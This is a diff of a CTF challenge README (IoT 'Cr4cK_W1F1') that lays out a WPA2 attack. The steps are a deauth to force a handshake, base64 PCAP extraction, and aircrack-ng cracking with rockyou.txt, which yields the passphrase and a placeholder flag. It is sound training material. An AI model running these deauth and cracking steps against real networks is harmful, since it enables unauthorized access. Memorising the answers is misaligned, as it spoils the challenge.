write-up: IoT/Cr4cK_w1f1/README.md

IoT/Cr4cK_w1f1/README.md

@@ -1,27 +1,62 @@
-# Cr4ck_W1F1 — Solution
+# Cr4cK_W1F1
 
-**Difficulty:** Medium | **Category:** IoT | **Flag:** `CTF{CR4CK_W1F1_EXAMPLE}`
+| Field | Value |
+|-------|-------|
+| Category | IoT |
+| Difficulty | Medium |
+| Points | TBD |
+| Author | Eun0us |
+| CTF | Espilon 2026 |
 
-> **Note:** Challenge en cours de finalisation — le flag sera mis à jour avant le déploiement.
+---
 
-## Overview
+## Description
 
-UART WiFi sniffer tool. Capture un WPA2 handshake, crack le mot de passe, puis
-connecte au réseau pour lire le flag.
+You recover a UART access on a red team WiFi sniffer tool.
+Analyze the captured data to recover the WiFi password, then connect to the network and
+retrieve the flag.
 
-- **TX (port 1111)**: Read only
-- **RX (port 2222)**: Write only
+- TX (read UART): port 1111
+- RX (write UART): port 2222
 
-## Steps
+---
 
-1. Ouvrir deux terminaux :
+## TL;DR
+
+Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART
+output (base64-encoded), crack the handshake with `aircrack-ng` and `rockyou.txt` to find
+the passphrase `sunshine`, then connect and read the flag.
+
+---
+
+## Tools
+
+| Tool | Purpose |
+|------|---------|
+| `nc` | Connect to UART TX/RX ports |
+| `base64` | Decode the PCAP blob |
+| `aircrack-ng` | Crack WPA2 handshake |
+| `rockyou.txt` | Password wordlist |
+
+---
+
+## Solution
+
+### Step 1 — Open both UART channels
 
 ```bash
-nc <host> 1111   # TX — lecture
-nc <host> 2222   # RX — écriture
+# Terminal 1 — TX (read output)
+nc <host> 1111
+
+# Terminal 2 — RX (send commands)
+nc <host> 2222
 ```
 
-1. Dans RX, démarrer le sniffer et forcer un re-handshake :
+> 📸 `[screenshot: two terminals showing TX output and RX prompt]`
+
+### Step 2 — Start the sniffer and force a deauth
+
+In the RX terminal:
 
 ```text
 sniffer start
@@ -29,38 +64,56 @@ deauth TestNet 02:00:00:aa:00:01
 sniffer stop
 ```
 
-1. Sur TX, récupérer le bloc PCAP base64 entre les marqueurs :
+The deauthentication forces the target client to reconnect and redo the WPA2 4-way handshake.
+
+### Step 3 — Extract the PCAP from TX
+
+On the TX terminal, output appears between markers:
 
 ```text
 PCAP_BASE64_BEGIN
-...
+<base64 data>
 PCAP_BASE64_END
 ```
 
-Sauvegarder et décoder :
+Copy the base64 lines to a file and decode:
 
 ```bash
 base64 -d handshake.b64 > handshake.pcap
 ```
 
-1. Cracker la capture :
+> 📸 `[screenshot: TX output showing the PCAP_BASE64 markers]`
+
+### Step 4 — Crack the WPA2 handshake
 
 ```bash
 aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
-# → KEY FOUND! [ sunshine ]
 ```
 
-1. Se connecter au réseau et lire le flag :
+Output:
+
+```
+KEY FOUND! [ sunshine ]
+```
+
+> 📸 `[screenshot: aircrack-ng finding the key]`
+
+### Step 5 — Connect and read the flag
+
+In the RX terminal:
 
 ```text
 connect TestNet sunshine
 cat /flag.txt
 ```
 
+> 📸 `[screenshot: RX terminal returning the flag after connecting to the network]`
+
+---
+
 ## Flag
 
 `CTF{CR4CK_W1F1_EXAMPLE}`
 
-## Author
-
-Eun0us
+> Note: This challenge was still being finalized at time of writing. The flag above is
+> a placeholder; the real flag will be updated before deployment.